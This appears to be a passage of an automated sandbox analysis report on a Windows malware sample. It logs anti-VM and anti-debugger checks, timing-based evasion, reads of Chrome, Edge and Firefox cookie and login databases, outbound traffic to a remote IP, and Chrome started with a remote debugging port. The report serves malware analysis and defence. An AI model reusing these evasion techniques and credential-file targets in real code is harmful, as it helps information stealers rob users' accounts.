Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79708C9 second address: 7970932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8C6D17D0B4h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8C6D17D0ACh 0x00000019 or ch, FFFFFFB8h 0x0000001c jmp 00007F8C6D17D0ABh 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, 6FAEA2DAh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c push edi 0x0000002d pushfd 0x0000002e jmp 00007F8C6D17D0AAh 0x00000033 sbb ax, B918h 0x00000038 jmp 00007F8C6D17D0ABh 0x0000003d popfd 0x0000003e pop ecx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C44 second address: 7940C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C4A second address: 7940C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C4E second address: 7940C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F8C6CC6478Bh 0x00000016 mov di, cx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C74 second address: 7940C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940C7A second address: 7940CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov al, 2Ah 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 and esp, FFFFFFF0h 0x00000017 jmp 00007F8C6CC64798h 0x0000001c sub esp, 44h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 mov ax, 8573h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7940E3E second address: 7940EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C6D17D0ABh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F8CDC6FE688h 0x00000013 jmp 00007F8C6D17D0B2h 0x00000018 pop edi 0x00000019 pushad 0x0000001a mov ecx, 33FFB12Dh 0x0000001f pushfd 0x00000020 jmp 00007F8C6D17D0AAh 0x00000025 sub ch, FFFFFFC8h 0x00000028 jmp 00007F8C6D17D0ABh 0x0000002d popfd 0x0000002e popad 0x0000002f pop esi 0x00000030 pushad 0x00000031 mov ebx, eax 0x00000033 mov cx, EF37h 0x00000037 popad 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8C6D17D0B9h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79808E0 second address: 79808E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79808E6 second address: 7980917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F8C6D17D0AEh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980917 second address: 798091F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 798091F second address: 7980925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980925 second address: 7980929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7980929 second address: 798092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Special instruction interceptor: First address: 130FA96 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2112
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2465
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window / User API: threadDelayed 2156
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8133
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 4.1 %
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6544 Thread sleep count: 50 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6544 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1440 Thread sleep count: 40 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1440 Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 3176 Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 3176 Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1532 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1532 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6004 Thread sleep count: 2112 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 6004 Thread sleep time: -4226112s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1488 Thread sleep count: 2465 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1488 Thread sleep time: -4932465s >= -30000s
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1248 Thread sleep count: 2156 > 30
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe TID: 1248 Thread sleep time: -4314156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep count: 1866 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep time: -186600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep count: 8133 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1016 Thread sleep time: -813300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2105336677.0000000002181000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.2482768165.000001E26F03E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: NTICE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: SICE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: SIWVID
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000781E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 13_2_000781E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_0007116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 13_2_0007116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_00071160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 13_2_00071160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000711A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 13_2_000711A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000713C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 13_2_000713C9
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP